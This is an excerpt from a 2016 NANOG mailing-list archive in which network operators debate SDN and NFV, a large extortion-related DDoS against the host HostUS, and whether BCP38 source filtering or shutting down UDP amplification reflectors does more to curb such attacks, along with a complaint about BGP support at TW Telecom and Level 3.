1,000x. The internet is a very interesting place when viewed from the lense of Automata theory, greedy self optimizing nodes.... very similar to biological systems (including economics ). Very robust since each node is greedy and self optimizing in its decision making power. This a fundamental component of the Internet's suceess. Some folks talk about sdn controllers and seperating control plane and forwarding plane. This breaks the ability for nodes to self optimize and thus undermines a key component of the robustness. It also diverts of the parallels of biological systems. Control and forwarding had beeb separate on the node for almost 20 years now. Sdn is like authoritarianism and divine creation rolled up into one and sold at 20% premium to easily duped telco types that want to travel to endless conferences > beyond that, i am not sure i see that much difference whether it's a > YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, > supported communities, ... > > randy > From rwfireguru at gmail.com Wed Aug 3 13:41:57 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Wed, 3 Aug 2016 09:41:57 -0400 Subject: Host.us DDOS attack Message-ID: Anyone have any additonal info on a DDOS attack hitting host.us? Woke up to no email this morning and the following from their web site: *Following an extortion attempt, HostUS is currently experiencing sustained large-scale DDOS attacks against a number of locations. The attacks were measured in one location at 300Gbps. In another location the attacks temporarily knocked out the entire metropolitan POP for a Tier-1 provider. Please be patient. We will return soon. Your understanding is appreciated. * >From my monitoring system, looks like my VPS went unavailable around 23:00 EDT last night. Robert From ahebert at pubnix.net Wed Aug 3 14:16:01 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Wed, 3 Aug 2016 10:16:01 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: Message-ID: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Well, Could it be related to the last 2 days DDoS of PokemonGO (which failed) and some other gaming sites (Blizzard and Steam)? And on the subject of CloudFlare, I'm sorry for that CloudFlare person that defended their position earlier this week, but there may be more hints (unverified) against your statements: https://twitter.com/xotehpoodle/status/756850023896322048 That could be explored. On top of which there is hints (unverified) on which is the real bad actor behind that new DDoS service: http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml And I quote: "One thing LeakedSource staff spotted was that the first payment recorded in the botnet's control panel was of $1, while payments for the same package plan were of $19.99." ( Paypal payments btw ) There is enough information, and damages, imho, to start looking for the people responsible from a legal standpoint. And hopefully the proper authorities are interested. PS: I will like to take this time to underline the lack of participation from a vast majority of ISPs into BCP38 and the like. We need to keep educating them at every occasion we have. For those that actually implemented some sort of tech against it, you are a beacon of hope in what is a ridiculous situation that has been happening for more than 15 years. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/03/16 09:41, Robert Webb wrote: > Anyone have any additonal info on a DDOS attack hitting host.us? > > Woke up to no email this morning and the following from their web site: > > > > *Following an extortion attempt, HostUS is currently experiencing sustained > large-scale DDOS attacks against a number of locations. The attacks were > measured in one location at 300Gbps. In another location the attacks > temporarily knocked out the entire metropolitan POP for a Tier-1 provider. > Please be patient. We will return soon. Your understanding is appreciated. > * > > > >From my monitoring system, looks like my VPS went unavailable around 23:00 > EDT last night. > > Robert > From rwfireguru at gmail.com Wed Aug 3 14:25:33 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Wed, 3 Aug 2016 10:25:33 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Not sure if it is related to the PokemonGO or not. This started around 23:00 EDT last night per my monitoring. Seems like a pretty big attack at 300Gbps and to also temporarily take a down a Tier 1 POP in a major city. I was interested as to if this might be a botnet or some type of reflection attack. Robert On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert wrote: > Well, > > > Could it be related to the last 2 days DDoS of PokemonGO (which > failed) and some other gaming sites (Blizzard and Steam)? > > > And on the subject of CloudFlare, I'm sorry for that CloudFlare > person that defended their position earlier this week, but there may be > more hints (unverified) against your statements: > > https://twitter.com/xotehpoodle/status/756850023896322048 > > That could be explored. > > > On top of which there is hints (unverified) on which is the real bad > actor behind that new DDoS service: > > > > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > > And I quote: > > "One thing LeakedSource staff spotted was that the first payment > recorded in the botnet's control panel was of $1, while payments for the > same package plan were of $19.99." > > ( Paypal payments btw ) > > > There is enough information, and damages, imho, to start looking for > the people responsible from a legal standpoint. And hopefully the > proper authorities are interested. > > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. > > ----- > Alain Hebert ahebert at pubnix.net > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 09:41, Robert Webb wrote: > > Anyone have any additonal info on a DDOS attack hitting host.us? > > > > Woke up to no email this morning and the following from their web site: > > > > > > > > *Following an extortion attempt, HostUS is currently experiencing > sustained > > large-scale DDOS attacks against a number of locations. The attacks were > > measured in one location at 300Gbps. In another location the attacks > > temporarily knocked out the entire metropolitan POP for a Tier-1 > provider. > > Please be patient. We will return soon. Your understanding is > appreciated. > > * > > > > > > >From my monitoring system, looks like my VPS went unavailable around > 23:00 > > EDT last night. > > > > Robert > > > > From morrowc.lists at gmail.com Wed Aug 3 14:27:57 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 3 Aug 2016 10:27:57 -0400 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: On Wed, Aug 3, 2016 at 8:20 AM, Ca By wrote: > > > On Wednesday, August 3, 2016, Randy Bush wrote: > >> > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built >> > appliance garbage that can't scale in a cost effective manner and >> > replacing it with some software solution on 'many' commodity >> > unix-like-hosts that can scale horizontally. >> >> my main worry about nfv is when they need more forwarding horsepower >> than the household appliance has, and the data plan is is moved >> > this is a scaling problem, and one which points to the need to not do 'all of one thing' ('all nfv will solve us!') you may still need other methods to load balance or deal with loads which are higher than the nfv platform(s) can deal with properly. In some sense this is the same problem as trying to push too many pps through a linecard which you know has a limit lower than line-rate. > out of the control plane and they are not congruent. we've had too many >> lessons debugging this situation (datakit, atm, ...). >> >> seperation of data/control plane ... does require knowledge about what you are doing and has clear implications on toolling, troubleshooting, etc. To some extent this mirrors anycast dns deployment problems. "I made a much more complex system, though from the outside perhaps it doesn't appear any different." be prepared for interesting times. > Sdn is like authoritarianism and divine creation rolled up into one and > sold at 20% premium to easily duped telco types that want to travel to > endless conferences > > Sure, you have to know what you are doing/buying... magic doesn't exist in this space. > > >> beyond that, i am not sure i see that much difference whether it's a >> YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, >> supported communities, ... >> >> randy >> > From rwfireguru at gmail.com Wed Aug 3 14:28:54 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Wed, 3 Aug 2016 10:28:54 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Apologies to all as the hostname in my subject is incorrect. It should be hostus.us... On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb wrote: > Not sure if it is related to the PokemonGO or not. This started around > 23:00 EDT last night per my monitoring. > > Seems like a pretty big attack at 300Gbps and to also temporarily take a > down a Tier 1 POP in a major city. > > I was interested as to if this might be a botnet or some type of > reflection attack. > > > Robert > > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert wrote: > >> Well, >> >> >> Could it be related to the last 2 days DDoS of PokemonGO (which >> failed) and some other gaming sites (Blizzard and Steam)? >> >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare >> person that defended their position earlier this week, but there may be >> more hints (unverified) against your statements: >> >> https://twitter.com/xotehpoodle/status/756850023896322048 >> >> That could be explored. >> >> >> On top of which there is hints (unverified) on which is the real bad >> actor behind that new DDoS service: >> >> >> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >> >> >> And I quote: >> >> "One thing LeakedSource staff spotted was that the first payment >> recorded in the botnet's control panel was of $1, while payments for the >> same package plan were of $19.99." >> >> ( Paypal payments btw ) >> >> >> There is enough information, and damages, imho, to start looking for >> the people responsible from a legal standpoint. And hopefully the >> proper authorities are interested. >> >> PS: >> >> I will like to take this time to underline the lack of >> participation from a vast majority of ISPs into BCP38 and the like. We >> need to keep educating them at every occasion we have. >> >> For those that actually implemented some sort of tech against >> it, you are a beacon of hope in what is a ridiculous situation that has >> been happening for more than 15 years. >> >> ----- >> Alain Hebert ahebert at pubnix.net >> PubNIX Inc. >> 50 boul. St-Charles >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >> >> On 08/03/16 09:41, Robert Webb wrote: >> > Anyone have any additonal info on a DDOS attack hitting host.us? >> > >> > Woke up to no email this morning and the following from their web site: >> > >> > >> > >> > *Following an extortion attempt, HostUS is currently experiencing >> sustained >> > large-scale DDOS attacks against a number of locations. The attacks were >> > measured in one location at 300Gbps. In another location the attacks >> > temporarily knocked out the entire metropolitan POP for a Tier-1 >> provider. >> > Please be patient. We will return soon. Your understanding is >> appreciated. >> > * >> > >> > >> > >From my monitoring system, looks like my VPS went unavailable around >> 23:00 >> > EDT last night. >> > >> > Robert >> > >> >> > From swm at emanon.com Wed Aug 3 14:32:33 2016 From: swm at emanon.com (Scott Morris) Date: Wed, 3 Aug 2016 10:32:33 -0400 Subject: Clueful BGP from TW-Telecom/L3 In-Reply-To: References: Message-ID: <6463BEF1-546E-41D3-8ABB-C7058BC55D2D@emanon.com> Yeah, considering that I STILL haven?t managed to get anyone in their supposed ?Tier 3? group to call back on the open case is just completely baffling to me. And with the Level 3 side, I?ve tried all sorts of different communities they supposedly use only to find that other policies override how those are treated along the way. I just don?t understand how customer support can be such a difficult thing. Scott From: Micah Croff Date: Tuesday, July 26, 2016 at 6:21 PM To: Scott Morris Cc: "nanog at nanog.org" Subject: Re: Clueful BGP from TW-Telecom/L3 Last I dealt with TW Telecom and BGP we had to explain to them that putting in a static route on both routers on top of BGP was not desired.? Then they reconfigured a circuit 30 miles away when trying to turn it up again causing an outage in our data center. ? Sorry, not super hopeful when it comes to TW Telecom. Micah On Mon, Jul 25, 2016 at 8:51 PM, Scott Morris wrote: Is there per chance anyone hanging on here who is clueful about BGP working with TW-Telecom and the recent integration with Level3???? I have a client that I consult with whose route is not getting sent from TW to L3 and the techs on the case are convinced we need to put different BGP communities in (both to TW link and other provider link) which of course we are putting in to satisfy them, but magically it is not working.? This SHOULD be an easy thing to figure out using the Looking Glass servers within both TW and Level3, but this concept is lost on techs we are dealing with. Anyone internal there who can contact me off-list would be greatly appreciated! Scott swm at emanon.com From cb.list6 at gmail.com Wed Aug 3 14:36:09 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 3 Aug 2016 07:36:09 -0700 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: On Wednesday, August 3, 2016, Alain Hebert wrote: > Well, > > > Could it be related to the last 2 days DDoS of PokemonGO (which > failed) and some other gaming sites (Blizzard and Steam)? > > > And on the subject of CloudFlare, I'm sorry for that CloudFlare > person that defended their position earlier this week, but there may be > more hints (unverified) against your statements: > > https://twitter.com/xotehpoodle/status/756850023896322048 > > That could be explored. > > > On top of which there is hints (unverified) on which is the real bad > actor behind that new DDoS service: > > > > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > > And I quote: > > "One thing LeakedSource staff spotted was that the first payment > recorded in the botnet's control panel was of $1, while payments for the > same package plan were of $19.99." > > ( Paypal payments btw ) > > > There is enough information, and damages, imho, to start looking for > the people responsible from a legal standpoint. And hopefully the > proper authorities are interested. > > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. > > Bcp38 is not the issue. It is only the trigger, and as long as one network in Elbonia allows spoofs, that one network can marshall 100s of gbs of ddos power. Years of telling people to do bcp38 has not worked. The issue is for you and your neighbor to turn off your reflecting udp amplifiers (open dns relay, ssdp, ntp, chargen) and generously block obvious ddos traffic. A healthy udp policer is also smart. I suggest taking a baseline of your normal peak udp traffic, and build a policer that drops all udp that is 10x the baseline for bw and pps. Bcp38 is good, but it is not the solution we need to tactically stop attacks. This is not pretty. But it works at keeping your network up. CB ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 09:41, Robert Webb wrote: > > Anyone have any additonal info on a DDOS attack hitting host.us? > > > > Woke up to no email this morning and the following from their web site: > > > > > > > > *Following an extortion attempt, HostUS is currently experiencing > sustained > > large-scale DDOS attacks against a number of locations. The attacks were > > measured in one location at 300Gbps. In another location the attacks > > temporarily knocked out the entire metropolitan POP for a Tier-1 > provider. > > Please be patient. We will return soon. Your understanding is > appreciated. > > * > > > > > > >From my monitoring system, looks like my VPS went unavailable around > 23:00 > > EDT last night. > > > > Robert > > > > From jwbensley at gmail.com Wed Aug 3 14:40:17 2016 From: jwbensley at gmail.com (James Bensley) Date: Wed, 3 Aug 2016 15:40:17 +0100 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: On 3 August 2016 at 15:16, Alain Hebert wrote: > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. At the risk of starting a "NANOG war" [1], BCP isn't a magic wand. If I find a zero day in the nasty customised kernels that OVH run on their clients boxes, I only need 300 compromised hosts to send 300Gbps of traffic without spoofing the IP or using amplification attacks [2]. I can rent a server with a 10Gbps connection for 1 hour for a few quid/dollars. I could generate hundreds of Gbps of traffic for about ?1000 from legitimate IPs, paid for with stolen card details. How will BCP save you then? Can everyone stop praising it like it was a some magic bullet? James. [1] A pathetic and futile one, so different from the rest. [2] Subsitute OVH for any half decent provider that isn't really oversubscribed. From ahebert at pubnix.net Wed Aug 3 14:53:22 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Wed, 3 Aug 2016 10:53:22 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> Well, I'm sorry. That sound like the CloudFlare argument: You cannot fix the DDoSs at the source because Elbonia can do it. The only solution is to pay for protection. Between you and me, if only Elbonia are left DDoSing at 100Gbps, we simply de-peer the commercial subnets from that country (leaving the govt subnets up obviously) and see for them to deal with their trash ISPs once for all. ( That's how we used to do it early on when the IIRC flooding started ). Or we keep getting DDoSed for the next 100+ years. PS: Yes, the fictional country from the Dilbert syndicated cartoons. On a humorous note: The DDoS protection lobby is our NRA. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/03/16 10:36, Ca By wrote: > On Wednesday, August 3, 2016, Alain Hebert wrote: > >> Well, >> >> >> Could it be related to the last 2 days DDoS of PokemonGO (which >> failed) and some other gaming sites (Blizzard and Steam)? >> >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare >> person that defended their position earlier this week, but there may be >> more hints (unverified) against your statements: >> >> https://twitter.com/xotehpoodle/status/756850023896322048 >> >> That could be explored. >> >> >> On top of which there is hints (unverified) on which is the real bad >> actor behind that new DDoS service: >> >> >> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >> >> >> And I quote: >> >> "One thing LeakedSource staff spotted was that the first payment >> recorded in the botnet's control panel was of $1, while payments for the >> same package plan were of $19.99." >> >> ( Paypal payments btw ) >> >> >> There is enough information, and damages, imho, to start looking for >> the people responsible from a legal standpoint. And hopefully the >> proper authorities are interested. >> >> PS: >> >> I will like to take this time to underline the lack of >> participation from a vast majority of ISPs into BCP38 and the like. We >> need to keep educating them at every occasion we have. >> >> For those that actually implemented some sort of tech against >> it, you are a beacon of hope in what is a ridiculous situation that has >> been happening for more than 15 years. >> >> > Bcp38 is not the issue. It is only the trigger, and as long as one network > in Elbonia allows spoofs, that one network can marshall 100s of gbs of > ddos power. Years of telling people to do bcp38 has not worked. > > The issue is for you and your neighbor to turn off your reflecting udp > amplifiers (open dns relay, ssdp, ntp, chargen) and generously block > obvious ddos traffic. A healthy udp policer is also smart. I suggest > taking a baseline of your normal peak udp traffic, and build a policer that > drops all udp that is 10x the baseline for bw and pps. > > Bcp38 is good, but it is not the solution we need to tactically stop > attacks. > > This is not pretty. But it works at keeping your network up. > > CB > > > ----- >> Alain Hebert ahebert at pubnix.net >> >> PubNIX Inc. >> 50 boul. St-Charles >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >> >> On 08/03/16 09:41, Robert Webb wrote: >>> Anyone have any additonal info on a DDOS attack hitting host.us? >>> >>> Woke up to no email this morning and the following from their web site: >>> >>> >>> >>> *Following an extortion attempt, HostUS is currently experiencing >> sustained >>> large-scale DDOS attacks against a number of locations. The attacks were >>> measured in one location at 300Gbps. In another location the attacks >>> temporarily knocked out the entire metropolitan POP for a Tier-1 >> provider. >>> Please be patient. We will return soon. Your understanding is >> appreciated. >>> * >>> >>> >>> >From my monitoring system, looks like my VPS went unavailable around >> 23:00 >>> EDT last night. >>> >>> Robert >>> >> From morrowc.lists at gmail.com Wed Aug 3 14:58:33 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 3 Aug 2016 10:58:33 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: On Wed, Aug 3, 2016 at 10:40 AM, James Bensley wrote: > How will > BCP save you then? Can everyone stop praising it like it was a some > magic bullet? > aren't you making a 'perfect is the enemy of good' argument here? 'seatbelts don't solve all car crash deaths, so let's just go mad-max!' From cb.list6 at gmail.com Wed Aug 3 15:05:04 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 3 Aug 2016 08:05:04 -0700 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> Message-ID: On Wednesday, August 3, 2016, Alain Hebert wrote: > Well, > > I'm sorry. > > That sound like the CloudFlare argument: You cannot fix the DDoSs > at the source because Elbonia can do it. The only solution is to pay > for protection. > > No. I hate the idea of paying for protection from a cloud or appliance. Elbonia just has the trigger. The loaded gun is the ddos reflector in comcast, cox, vz, and everyone else. > Between you and me, if only Elbonia are left DDoSing at 100Gbps, we > simply de-peer the commercial subnets from that country (leaving the > govt subnets up obviously) and see for them to deal with their trash > ISPs once for all. ( That's how we used to do it early on when the IIRC > flooding started ). > > There are known problematic networks. I have not seen any of them or their facilitating upstreams depeered. I can name 4 networks that source 75% of my attack attack traffic. Comcast was one due to their ssdp reflection, they stopped that now. But still lots of dns attacks from them. Or we keep getting DDoSed for the next 100+ years. > > On that track. > PS: Yes, the fictional country from the Dilbert syndicated cartoons. > > > Swap in your favorite real world country / network that has very real abuse source reputation. > On a humorous note: > > The DDoS protection lobby is our NRA. > > ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 10:36, Ca By wrote: > > On Wednesday, August 3, 2016, Alain Hebert > wrote: > > > >> Well, > >> > >> > >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> failed) and some other gaming sites (Blizzard and Steam)? > >> > >> > >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> person that defended their position earlier this week, but there may be > >> more hints (unverified) against your statements: > >> > >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> > >> That could be explored. > >> > >> > >> On top of which there is hints (unverified) on which is the real bad > >> actor behind that new DDoS service: > >> > >> > >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> > >> > >> And I quote: > >> > >> "One thing LeakedSource staff spotted was that the first payment > >> recorded in the botnet's control panel was of $1, while payments for the > >> same package plan were of $19.99." > >> > >> ( Paypal payments btw ) > >> > >> > >> There is enough information, and damages, imho, to start looking for > >> the people responsible from a legal standpoint. And hopefully the > >> proper authorities are interested. > >> > >> PS: > >> > >> I will like to take this time to underline the lack of > >> participation from a vast majority of ISPs into BCP38 and the like. We > >> need to keep educating them at every occasion we have. > >> > >> For those that actually implemented some sort of tech against > >> it, you are a beacon of hope in what is a ridiculous situation that has > >> been happening for more than 15 years. > >> > >> > > Bcp38 is not the issue. It is only the trigger, and as long as one > network > > in Elbonia allows spoofs, that one network can marshall 100s of gbs of > > ddos power. Years of telling people to do bcp38 has not worked. > > > > The issue is for you and your neighbor to turn off your reflecting udp > > amplifiers (open dns relay, ssdp, ntp, chargen) and generously block > > obvious ddos traffic. A healthy udp policer is also smart. I suggest > > taking a baseline of your normal peak udp traffic, and build a policer > that > > drops all udp that is 10x the baseline for bw and pps. > > > > Bcp38 is good, but it is not the solution we need to tactically stop > > attacks. > > > > This is not pretty. But it works at keeping your network up. > > > > CB > > > > > > ----- > >> Alain Hebert ahebert at pubnix.net > > >> > >> PubNIX Inc. > >> 50 boul. St-Charles > >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >> > >> On 08/03/16 09:41, Robert Webb wrote: > >>> Anyone have any additonal info on a DDOS attack hitting host.us? > >>> > >>> Woke up to no email this morning and the following from their web site: > >>> > >>> > >>> > >>> *Following an extortion attempt, HostUS is currently experiencing > >> sustained > >>> large-scale DDOS attacks against a number of locations. The attacks > were > >>> measured in one location at 300Gbps. In another location the attacks > >>> temporarily knocked out the entire metropolitan POP for a Tier-1 > >> provider. > >>> Please be patient. We will return soon. Your understanding is > >> appreciated. > >>> * > >>> > >>> > >>> >From my monitoring system, looks like my VPS went unavailable around > >> 23:00 > >>> EDT last night. > >>> > >>> Robert > >>> > >> > > From ahebert at pubnix.net Wed Aug 3 15:06:29 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Wed, 3 Aug 2016 11:06:29 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Well, I didn't want to pollute nanog list with my BCP38 (or other solutions) ranting, but come on: [1] How can insuring source IP's, coming out your network, are part of your advertised subnets pathetic and futile? Don't you think if the source ip are traceable back to OVH actually, it would be easy for OVH to see and deal with it, instead of noises with random source IP coming from the bunch of un-patched residential routers in Latin America's (for example)? And we're back on track with "do nothing but pay for protection" as the only solution. Gotta love Humans. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/03/16 10:40, James Bensley wrote: > On 3 August 2016 at 15:16, Alain Hebert wrote: >> PS: >> >> I will like to take this time to underline the lack of >> participation from a vast majority of ISPs into BCP38 and the like. We >> need to keep educating them at every occasion we have. >> >> For those that actually implemented some sort of tech against >> it, you are a beacon of hope in what is a ridiculous situation that has >> been happening for more than 15 years. > > At the risk of starting a "NANOG war" [1], BCP isn't a magic wand. > > If I find a zero day in the nasty customised kernels that OVH run on > their clients boxes, I only need 300 compromised hosts to send 300Gbps > of traffic without spoofing the IP or using amplification attacks [2]. > > I can rent a server with a 10Gbps connection for 1 hour for a few > quid/dollars. I could generate hundreds of Gbps of traffic for about > ?1000 from legitimate IPs, paid for with stolen card details. How will > BCP save you then? Can everyone stop praising it like it was a some > magic bullet? > > James. > > > [1] A pathetic and futile one, so different from the rest. > > [2] Subsitute OVH for any half decent provider that isn't really oversubscribed. > From nanog at ics-il.net Wed Aug 3 15:09:07 2016 From: nanog at ics-il.net (Mike Hammett) Date: Wed, 3 Aug 2016 10:09:07 -0500 (CDT) Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: <1302086702.14567.1470236945871.JavaMail.mhammett@ThunderFuck> Doing BCP38 or blocking\shutting off known amplification vectors both require effort and both accomplish the same thing. Of course doing both is best. :-) One provider in "Elbonia" getting through is far more damaging to that provider in Elbonia than the rest of the world, if they were the only ones left. Do many last mile providers implement BCP38 at their CE? Seems like it's better to stop it at the CE than the PE. ----- Mike Hammett Intelligent Computing Solutions http://www.ics-il.com Midwest-IX http://www.midwest-ix.com ----- Original Message ----- From: "Ca By" To: ahebert at pubnix.net Cc: nanog at nanog.org Sent: Wednesday, August 3, 2016 9:36:09 AM Subject: Re: Host.us DDOS attack -and- related conversations On Wednesday, August 3, 2016, Alain Hebert wrote: > Well, > > > Could it be related to the last 2 days DDoS of PokemonGO (which > failed) and some other gaming sites (Blizzard and Steam)? > > > And on the subject of CloudFlare, I'm sorry for that CloudFlare > person that defended their position earlier this week, but there may be > more hints (unverified) against your statements: > > https://twitter.com/xotehpoodle/status/756850023896322048 > > That could be explored. > > > On top of which there is hints (unverified) on which is the real bad > actor behind that new DDoS service: > > > > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > > And I quote: > > "One thing LeakedSource staff spotted was that the first payment > recorded in the botnet's control panel was of $1, while payments for the > same package plan were of $19.99." > > ( Paypal payments btw ) > > > There is enough information, and damages, imho, to start looking for > the people responsible from a legal standpoint. And hopefully the > proper authorities are interested. > > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. > > Bcp38 is not the issue. It is only the trigger, and as long as one network in Elbonia allows spoofs, that one network can marshall 100s of gbs of ddos power. Years of telling people to do bcp38 has not worked. The issue is for you and your neighbor to turn off your reflecting udp amplifiers (open dns relay, ssdp, ntp, chargen) and generously block obvious ddos traffic. A healthy udp policer is also smart. I suggest taking a baseline of your normal peak udp traffic, and build a policer that drops all udp that is 10x the baseline for bw and pps. Bcp38 is good, but it is not the solution we need to tactically stop attacks. This is not pretty. But it works at keeping your network up. CB ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 09:41, Robert Webb wrote: > > Anyone have any additonal info on a DDOS attack hitting host.us? > > > > Woke up to no email this morning and the following from their web site: > > > > > > > > *Following an extortion attempt, HostUS is currently experiencing > sustained > > large-scale DDOS attacks against a number of locations. The attacks were > > measured in one location at 300Gbps. In another location the attacks > > temporarily knocked out the entire metropolitan POP for a Tier-1 > provider. > > Please be patient. We will return soon. Your understanding is > appreciated. > > * > > > > > > >From my monitoring system, looks like my VPS went unavailable around > 23:00 > > EDT last night. > > > > Robert > > > > From cb.list6 at gmail.com Wed Aug 3 15:09:34 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 3 Aug 2016 08:09:34 -0700 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: On Wednesday, August 3, 2016, Christopher Morrow wrote: > On Wed, Aug 3, 2016 at 10:40 AM, James Bensley > wrote: > > > How will > > BCP save you then? Can everyone stop praising it like it was a some > > magic bullet? > > > > aren't you making a 'perfect is the enemy of good' argument here? > > 'seatbelts don't solve all car crash deaths, so let's just go mad-max!' > The point is, i have my seat belt on. I am doing the right thing. my car still gets smashed becuase mad max is on the road. I now have a broken back. And you are telling me to make sure to wear a seat belt. Did that. Did not stop mad max from ruining my day. Please provide more and better advice on avoiding injury. Step one. Collectively work to deflate mad max's tires (stop the udp reflectors that max uses) From nanog at ics-il.net Wed Aug 3 15:11:02 2016 From: nanog at ics-il.net (Mike Hammett) Date: Wed, 3 Aug 2016 10:11:02 -0500 (CDT) Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: <728812864.14570.1470237057599.JavaMail.mhammett@ThunderFuck> Stopping one vector that makes up the largest of DDoSes certainly isn't a bad thing. ----- Mike Hammett Intelligent Computing Solutions http://www.ics-il.com 